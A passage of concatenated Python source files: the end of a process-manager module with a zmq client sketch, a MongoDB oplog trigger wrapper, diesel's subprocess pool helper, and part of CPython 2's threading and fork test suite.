if 'operation' in d_meta: str_cmd = d_meta['operation']
if 'dbpath' in d_meta: str_DBpath = d_meta['dbpath']
if 'fileio' in d_meta: str_fileio = d_meta['fileio']
if str_action.lower() == 'run' and str_context.lower() == 'db':
self.within.DB_fileIO( cmd = str_cmd,
fileio = str_fileio,
dbpath = str_DBpath,
db = tree_DB)
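# ----------------------------------------------------------------------------
# Illustrative only -- a minimal client sketch (not part of pman itself) for
# the REST-like wire format that Listener.process() parses above: an
# HTTP-style request line, a blank line, and the JSON body as the *last*
# line of the message, sent as a single frame over a zmq DEALER socket so
# that the ROUTER front end sees exactly [identity, data]. The address is an
# assumption -- substitute the protocol/IP/port the server was started with.
def pman_client_hello(str_addr = 'tcp://127.0.0.1:5010'):
    import json
    import zmq
    ctx     = zmq.Context()
    sock    = ctx.socket(zmq.DEALER)
    sock.connect(str_addr)
    d_msg   = {'payload': {'action':    'hello',
                           'meta':      {'askAbout': 'timestamp'}}}
    str_req = 'POST /api/v1/cmd HTTP/1.1\n\n%s' % json.dumps(d_msg)
    sock.send(str_req.encode())
    # The worker replies with an "HTTP/1.1 <Response>" style string.
    return sock.recv().decode()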
class Poller(threading.Thread):
"""
The Poller checks for running processes based on the internal
DB and system process table. Jobs that are no longer running are
removed from the internal DB.
"""
def __init__(self, **kwargs):
self.pollTime = 10
self.str_cmd = ""
self.crunner = None
self.queueStart = queue.Queue()
self.queueEnd = queue.Queue()
self.queueAllDone = queue.Queue()
# self.dp.qprint('starting...', level=-1)
# Debug parameters
self.str_debugFile = '/dev/null'
self.b_debugToFile = True
for key,val in kwargs.items():
if key == 'pollTime': self.pollTime = val
if key == 'cmd': self.str_cmd = val
if key == 'debugFile': self.str_debugFile = val
if key == 'debugToFile': self.b_debugToFile = val
self.dp = debug(verbosity = 0,
level = -1,
debugFile = self.str_debugFile,
debugToFile = self.b_debugToFile)
threading.Thread.__init__(self)
def run(self):
""" Main execution. """
timeout = 1
loop = 10
# Spawn the crunner object container
self.crunner = Crunner(cmd = self.str_cmd,
debugToFile = self.b_debugToFile,
debugFile = self.str_debugFile)
self.crunner.start()
b_jobsAllDone = False
while not b_jobsAllDone:
try:
b_jobsAllDone = self.crunner.queueAllDone.get_nowait()
except queue.Empty:
# We basically propagate the queue contents "up" the chain.
self.dp.qprint('Waiting on start job info')
self.queueStart.put(self.crunner.queueStart.get())
self.dp.qprint('Waiting on end job info')
self.queueEnd.put(self.crunner.queueEnd.get())
self.queueAllDone.put(b_jobsAllDone)
self.dp.qprint("done with Poller.run")
class Crunner(threading.Thread):
"""
The wrapper thread around the actual process.
"""
def __init__(self, **kwargs):
self.__name = "Crunner"
self.queueStart = queue.Queue()
self.queueEnd = queue.Queue()
self.queueAllDone = queue.Queue()
self.str_cmd = ""
# Debug parameters
self.str_debugFile = '/dev/null'
self.b_debugToFile = True
for k,v in kwargs.items():
if k == 'cmd': self.str_cmd = v
if k == 'debugFile': self.str_debugFile = v
if k == 'debugToFile': self.b_debugToFile = v
self.shell = crunner( verbosity = 0,
level = -1,
debugToFile = self.b_debugToFile,
debugFile = self.str_debugFile)
self.dp = debug( verbosity = 0,
level = -1,
debugFile = self.str_debugFile,
debugToFile = self.b_debugToFile)
self.dp.qprint('starting crunner...')
threading.Thread.__init__(self)
def jsonJobInfo_queuePut(self, **kwargs):
"""
Get and return the job dictionary as a json string.
"""
str_queue = 'startQueue'
for k,v in kwargs.items():
if k == 'queue': str_queue = v
if str_queue == 'startQueue': queue = self.queueStart
if str_queue == 'endQueue': queue = self.queueEnd
# self.dp.qprint(self.shell.d_job)
queue.put(self.shell.d_job.copy())
def run(self):
""" Main execution. """
timeout = 1
loop = 10
self.dp.qprint("running...")
self.shell(self.str_cmd)
# self.shell.jobs_loopctl( onJobStart = 'self.jsonJobInfo_queuePut(queue="startQueue")',
# onJobDone = 'self.jsonJobInfo_queuePut(queue="endQueue")')
self.shell.jobs_loopctl( onJobStart = partial(self.jsonJobInfo_queuePut, queue="startQueue"),
onJobDone = partial(self.jsonJobInfo_queuePut, queue="endQueue"))
self.queueAllDone.put(True)
self.queueStart.put({'allJobsStarted': True})
self.queueEnd.put({'allJobsDone': True})
# self.shell.exitOnDone()
self.dp.qprint('Crunner.run() returning...')
|
mongotriggers.py
|
"""Class for manipulating notifications from MongoDB """
from .mongodtriggers import MongodTrigger
import threading
class MongoTrigger(object):
def __init__(self, conn, since=None):
"""Creates MongoTriggers instance
The object uses a defered context to provide notification on a
different context to avoid exploiting the caller thread/process
Args:
conn (MongoClient) - connection on which triggers will be fired
since (datetime) - the last timestamp to start listening from
"""
self.trigger = MongodTrigger(conn, since)
self.thread = None
def tail_oplog(self):
"""Listens to oplog and fire the registered callbacks """
if self.thread:
raise OSError("unable to tail using more than 1 thread")
self.thread = threading.Thread(target=self.trigger.start_tailing)
self.thread.start()
def stop_tail(self):
"""Stops listening to the oplog, no callbacks after calling this """
self.trigger.stop_tailing()
self.thread.join()
self.thread = None
def register_op_trigger(self, func, db_name=None, collection_name=None):
"""Watches the specified database and collections for any changes
Args:
func (callback): function to be invoked when any operation occurs
db_name (str): name of Mongo database to watch for changes
collection_name (str): name of Mongo collection to watch for changes
"""
self.trigger.register_insert_trigger(func, db_name, collection_name)
self.trigger.register_update_trigger(func, db_name, collection_name)
self.trigger.register_delete_trigger(func, db_name, collection_name)
def register_insert_trigger(self, func, db_name=None, collection_name=None):
"""Adds an insert callback to the specified namespace
Args:
func (callback): callback to execute when an insert operation occurs
db_name (str): name of Mongo database to watch for changes
collection_name (str): name of Mongo collection to watch for changes
"""
self.trigger.register_insert_trigger(func, db_name, collection_name)
def register_update_trigger(self, func, db_name=None, collection_name=None):
"""Adds ann update callback to the specified namespace
Args:
func (callback): callback to execute when an update operation occurs
db_name (str): name of Mongo database to watch for changes
collection_name (str): name of Mongo collection to watch for changes
"""
self.trigger.register_update_trigger(func, db_name, collection_name)
def register_delete_trigger(self, func, db_name=None, collection_name=None):
"""Adds a delete callback to the specified namespace
Args:
func (callback): callback to execute when a delete operation occurs
db_name (str): name of Mongo database to watch for changes
collection_name (str): name of Mongo collection to watch for changes
"""
self.trigger.register_delete_trigger(func, db_name, collection_name)
def unregister_op_trigger(self, func, db_name=None, collection_name=None):
"""Removes all callbacks from the specified namespace
Args:
func (callback): callback to disable when any operation occurs
db_name (str): name of Mongo database to watch for changes
collection_name (str): name of Mongo collection to watch for changes
"""
self.trigger.unregister_insert_trigger(func, db_name, collection_name)
self.trigger.unregister_update_trigger(func, db_name, collection_name)
self.trigger.unregister_delete_trigger(func, db_name, collection_name)
def unregister_insert_trigger(self, func, db_name=None, collection_name=None):
"""Removes an insert callback from the specified namespace
Args:
func (callback): callback to disable when an insert operation occurs
db_name (str): name of Mongo database to watch for changes
collection_name (str): name of Mongo collection to watch for changes
"""
self.trigger.unregister_insert_trigger(func, db_name, collection_name)
def unregister_update_trigger(self, func, db_name=None, collection_name=None):
"""Removes an update callback from the specified namespace
Args:
func (callback): callback to disable when an update operation occurs
db_name (str): name of Mongo database to watch for changes
collection_name (str): name of Mongo collection to watch for changes
"""
self.trigger.unregister_update_trigger(func, db_name, collection_name)
def unregister_delete_trigger(self, func, db_name=None, collection_name=None):
"""Removes a delete callback from the specified namespace
Args:
func (callback): callback to disable when a delete operation occurs
db_name (str): name of Mongo database to watch for changes
collection_name (str): name of Mongo collection to watch for changes
"""
self.trigger.unregister_delete_trigger(func, db_name, collection_name)
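# A minimal usage sketch (illustrative only). It assumes a reachable mongod
# whose oplog can be tailed (e.g. a replica-set member) and that registered
# callbacks receive the raw oplog document -- the exact callback signature is
# defined by MongodTrigger, so treat it as an assumption here.
if __name__ == '__main__':
    from pymongo import MongoClient

    def on_insert(op_document):
        # Fired for every insert in the watched namespace.
        print(op_document)

    client = MongoClient('localhost', 27017)
    triggers = MongoTrigger(client)
    triggers.register_insert_trigger(on_insert, 'test_db', 'test_collection')
    triggers.tail_oplog()   # start tailing on a background thread
    # ... application work happens here ...
    triggers.stop_tail()    # stop tailing and join the thread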
|
process.py
|
"""diesel's async I/O event hub meets multiprocessing.
Lets you run CPU-intensive work in subprocesses without blocking the event hub
while doing so.
"""
import multiprocessing as mp
import traceback
from diesel import runtime
from diesel import core
from diesel.util.queue import Queue
def spawn(func):
"""Spawn a new process that will run func.
The returned Process instance can be called just like func.
The spawned OS process lives until it is term()ed or otherwise dies. Each
call to the returned Process instance results in another iteration of
the remote loop. This way a single process can handle multiple calls to
func.
"""
return Process(func)
def term(proc):
"""Terminate the given proc.
That is all.
"""
proc.cleanup()
proc.proc.terminate()
class ConflictingCall(Exception):
pass
class Process(object):
"""A subprocess that cooperates with diesel's event hub.
Communication with the spawned process happens over a pipe. Data that
is to be sent to or received from the process is dispatched by the
event hub. This makes it easy to run CPU intensive work in a non-blocking
fashion and utilize multiple CPU cores.
"""
def __init__(self, func):
"""Creates a new Process instance that will call func.
The returned instance can be called as if it were func. The following
code will run ``time.sleep`` in a subprocess and execution will resume
when the remote call completes. Other green threads can run in the
meantime.
>>> time_sleep = Process(time.sleep)
>>> time_sleep(4.2)
>>> do_other_stuff()
"""
self.func = func
self.proc = None
self.caller = None
self.args = None
self.params = None
self.pipe = None
self.in_call = False
self.launch()
def launch(self):
"""Starts a subprocess and connects it to diesel's plumbing.
A pipe is created, registered with the event hub and used to
communicate with the subprocess.
"""
self.pipe, remote_pipe = mp.Pipe()
runtime.current_app.hub.register(
self.pipe,
self.handle_return_value,
self.send_arguments_to_process,
runtime.current_app.global_bail('Process error!'),
)
def wrapper(pipe):
while True:
try:
args, params = pipe.recv()
pipe.send(self.func(*args, **params))
except (SystemExit, KeyboardInterrupt):
pipe.close()
break
except Exception, e:
e.original_traceback = traceback.format_exc()
pipe.send(e)
self.proc = mp.Process(target=wrapper, args=(remote_pipe,))
self.proc.daemon = True
self.proc.start()
def cleanup(self):
runtime.current_app.hub.unregister(self.pipe)
def handle_return_value(self):
"""Wakes up the caller with the return value of the subprocess func.
Called by the event hub when data is ready.
"""
try:
result = self.pipe.recv()
except EOFError:
self.pipe.close()
self.proc.terminate()
else:
self.in_call = False
self.caller.wake(result)
def send_arguments_to_process(self):
"""Sends the arguments to the function to the remote process.
Called by the event hub after the instance has been called.
"""
runtime.current_app.hub.disable_write(self.pipe)
self.pipe.send((self.args, self.params))
def __call__(self, *args, **params):
"""Trigger the execution of self.func in the subprocess.
Switches control back to the event hub, letting other loops run until
the subprocess finishes computation. Returns the result of the
subprocess's call to self.func.
"""
if self.in_call:
msg = "Another loop (%r) is executing this process." % self.caller
raise ConflictingCall(msg)
runtime.current_app.hub.enable_write(self.pipe)
self.args = args
self.params = params
self.caller = core.current_loop
self.in_call = True
return self.caller.dispatch()
class NoSubProcesses(Exception):
pass
class ProcessPool(object):
"""A bounded pool of subprocesses.
An instance is callable, just like a Process, and will return the result
of executing the function in a subprocess. If all subprocesses are busy,
the caller will wait in a queue.
"""
def __init__(self, concurrency, handler):
"""Creates a new ProcessPool with subprocesses that run the handler.
Args:
concurrency (int): The number of subprocesses to spawn.
handler (callable): A callable that the subprocesses will execute.
"""
self.concurrency = concurrency
self.handler = handler
self.available_procs = Queue()
self.all_procs = []
def __call__(self, *args, **params):
"""Gets a process from the pool, executes it, and returns the results.
This call will block until there is a process available to handle it.
"""
if not self.all_procs:
raise NoSubProcesses("Did you forget to start the pool?")
try:
p = self.available_procs.get()
result = p(*args, **params)
return result
finally:
self.available_procs.put(p)
def pool(self):
"""A callable that starts the processes in the pool.
This is useful as the callable to pass to a diesel.Loop when adding a
ProcessPool to your application.
"""
for i in xrange(self.concurrency):
proc = spawn(self.handler)
self.available_procs.put(proc)
self.all_procs.append(proc)
if __name__ == '__main__':
import diesel
def sleep_and_return(secs):
import time
start = time.time()
time.sleep(secs)
return time.time() - start
sleep_pool = ProcessPool(2, sleep_and_return)
def main():
def waiting(ident):
print ident, "waiting ..."
t = sleep_pool(4)
print ident, "woken up after", t
diesel.fork(waiting, 'a')
diesel.fork(waiting, 'b')
diesel.fork(waiting, 'c')
for i in xrange(11):
print "busy!"
diesel.sleep(1)
div = spawn(lambda x,y: x/y)
try:
div(1,0)
except ZeroDivisionError, e:
diesel.log.error(e.original_traceback)
print '^^ That was an intentional exception.'
term(div)
psleep = spawn(sleep_and_return)
diesel.fork(psleep, 0.5)
diesel.fork(psleep, 0.5)
diesel.sleep(1)
print '^^ That was an intentional exception.'
diesel.quickstop()
diesel.quickstart(sleep_pool.pool, main)
|
test_threading.py
|
# expected: fail
# Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose, cpython_only
from test.script_helper import assert_python_ok
import random
import re
import sys
thread = test.test_support.import_module('thread')
threading = test.test_support.import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
try:
import _testcapi
except ImportError:
_testcapi = None
from test import lock_tests
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assertTrue(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assertTrue(self.nrunning.get() >= 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.test_support.threading_setup()
def tearDown(self):
test.test_support.threading_cleanup(*self._threads)
test.test_support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, None)
self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assertTrue(not t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assertTrue(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
self.skipTest('platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
self.skipTest('platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
self.skipTest('requires ctypes')
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = thread.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print " verifying worker hasn't exited"
self.assertTrue(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise thread.error()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(thread.error, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
    def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
self.skipTest('requires ctypes')
rc = subprocess.call([sys.executable, "-c", """if 1:
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
"""])
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
            # testsuite from hanging forever
def killer():
import os, time
time.sleep(2)
print 'program blocked; aborting'
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
rc = p.returncode
self.assertFalse(rc == 2, "interpreted was blocked")
self.assertTrue(rc == 0,
"Unexpected error: " + repr(stderr))
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print "Woke up, sleep function is:", sleep
threading.Thread(target=child).start()
raise SystemExit
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
self.assertEqual(stdout.strip(),
"Woke up, sleep function is: <built-in function sleep>")
        stderr = re.sub(r"^\[\d+ refs\]", "", stderr, flags=re.MULTILINE).strip()
self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEqual(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEqual(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, '')
self.assertEqual(err, '')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getcheckinterval()
# Make the bug more likely to manifest.
sys.setcheckinterval(10)
try:
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(1 if t.is_alive() else 0)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
finally:
sys.setcheckinterval(old_interval)
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
class ThreadJoinOnShutdown(BaseTestCase):
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'os2emx')
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
\n""" + script
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
p.stdout.close()
self.assertEqual(data, "end of main\nend of thread\n")
self.assertFalse(rc == 2, "interpreter was blocked")
self.assertTrue(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
def assertScriptHasOutput(self, script, expected_output):
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().decode().replace('\r', '')
self.assertEqual(rc, 0, "Unexpected error")
self.assertEqual(data, expected_output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_joining_across_fork_in_worker_thread(self):
# There used to be a possible deadlock when forking from a child
# thread. See http://bugs.python.org/issue6643.
# The script takes the following steps:
# - The main thread in the parent process starts a new thread and then
# tries to join it.
# - The join operation acquires the Lock inside the thread's _block
# Condition. (See threading.py:Thread.join().)
# - We stub out the acquire method on the condition to force it to wait
# until the child thread forks. (See LOCK ACQUIRED HERE)
# - The child thread forks. (See LOCK HELD and WORKER THREAD FORKS
# HERE)
# - The main thread of the parent process enters Condition.wait(),
# which releases the lock on the child thread.
# - The child process returns. Without the necessary fix, when the
# main thread of the child process (which used to be the child thread
# in the parent process) attempts to exit, it will try to acquire the
# lock in the Thread._block Condition object and hang, because the
# lock was held across the fork.
script = """if 1:
import os, time, threading
finish_join = False
start_fork = False
def worker():
# Wait until this thread's lock is acquired before forking to
# create the deadlock.
global finish_join
while not start_fork:
time.sleep(0.01)
# LOCK HELD: Main thread holds lock across this call.
childpid = os.fork()
finish_join = True
if childpid != 0:
# Parent process just waits for child.
os.waitpid(childpid, 0)
# Child process should just return.
w = threading.Thread(target=worker)
# Stub out the private condition variable's lock acquire method.
# This acquires the lock and then waits until the child has forked
# before returning, which will release the lock soon after. If
# someone else tries to fix this test case by acquiring this lock
# before forking instead of resetting it, the test case will
# deadlock when it shouldn't.
condition = w._block
orig_acquire = condition.acquire
call_count_lock = threading.Lock()
call_count = 0
def my_acquire():
global call_count
global start_fork
orig_acquire() # LOCK ACQUIRED HERE
start_fork = True
if call_count == 0:
while not finish_join:
time.sleep(0.01) # WORKER THREAD FORKS HERE
with call_count_lock:
call_count += 1
condition.acquire = my_acquire
w.start()
w.join()
print('end of main')
"""
self.assertScriptHasOutput(script, "end of main\n")
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_5_clear_waiter_locks_to_avoid_crash(self):
# Check that a spawned thread that forks doesn't segfault on certain
# platforms, namely OS X. This used to happen if there was a waiter
# lock in the thread's condition variable's waiters list. Even though
# we know the lock will be held across the fork, it is not safe to
# release locks held across forks on all platforms, so releasing the
# waiter lock caused a segfault on OS X. Furthermore, since locks on
# OS X are (as of this writing) implemented with a mutex + condition
# variable instead of a semaphore, while we know that the Python-level
# lock will be acquired, we can't know if the internal mutex will be
# acquired at the time of the fork.
script = """if True:
import os, time, threading
start_fork = False
def worker():
# Wait until the main thread has attempted to join this thread
# before continuing.
while not start_fork:
time.sleep(0.01)
childpid = os.fork()
if childpid != 0:
# Parent process just waits for child.
(cpid, rc) = os.waitpid(childpid, 0)
assert cpid == childpid
assert rc == 0
print('end of worker thread')
else:
# Child process should just return.
pass
w = threading.Thread(target=worker)
# Stub out the private condition variable's _release_save method.
# This releases the condition's lock and flips the global that
# causes the worker to fork. At this point, the problematic waiter
# lock has been acquired once by the waiter and has been put onto
# the waiters list.
condition = w._block
orig_release_save = condition._release_save
def my_release_save():
global start_fork
orig_release_save()
# Waiter lock held here, condition lock released.
start_fork = True
condition._release_save = my_release_save
w.start()
w.join()
print('end of main thread')
"""
output = "end of worker thread\nend of main thread\n"
self.assertScriptHasOutput(script, output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@cpython_only
@unittest.skipIf(_testcapi is None, "need _testcapi module")
def test_frame_tstate_tracing(self):
